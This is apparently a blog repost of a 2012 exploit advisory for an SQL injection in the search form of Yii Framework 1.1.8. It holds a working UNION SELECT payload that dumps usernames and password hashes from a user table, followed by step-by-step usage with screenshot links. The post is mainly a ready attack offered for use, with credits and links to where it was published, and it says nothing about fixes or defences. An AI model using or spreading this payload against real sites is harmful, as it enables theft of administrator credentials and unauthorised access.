
Phan Anh Buổi Sáng


Yii Framework - Search SQL Injection Vulnerability

Unknown | Labels: Exploit, SQL Injection | 07:08
# Exploit Title: Yii Framework - Search SQL Injection Vulnerability
# Google Dork: No Dork
# Date: 20/11/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://www.yiiframework.com/
# Software Link: http://www.yiiframework.com/download/
# Version: 1.1.8 (maybe another version)
#
##############################################################################################
Vulnerability:
##############################################################################################

SQL injection via the search form. The injected query can return information about the administrator account, among other data.

##############################################################################################
Exploitation:
##############################################################################################

' UNION SELECT 1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 fRom user-- -

##############################################################################################
Ex:
##############################################################################################

1. Enter a query containing a quote in the search form: http://i.imgur.com/8OShy.png
2. It will display an error message: http://i.imgur.com/b8Tbo.png
3. Now, get some info with SQL Injection: http://i.imgur.com/qLjc0.png
4. Result: http://i.imgur.com/dgCRU.png

##############################################################################################
More Details:
##############################################################################################

Website: http://junookyo.blogspot.com/
About Exploit: http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html

##############################################################################################
Great thanks to Juno_okyo and James - J2TeaM
##############################################################################################

Published (21/11/2012):
[+] http://www.exploit-db.com/exploits/22877
[+] http://www.1337day.com/exploit/19778
[+] http://cxsecurity.com/issue/WLB-2012110151
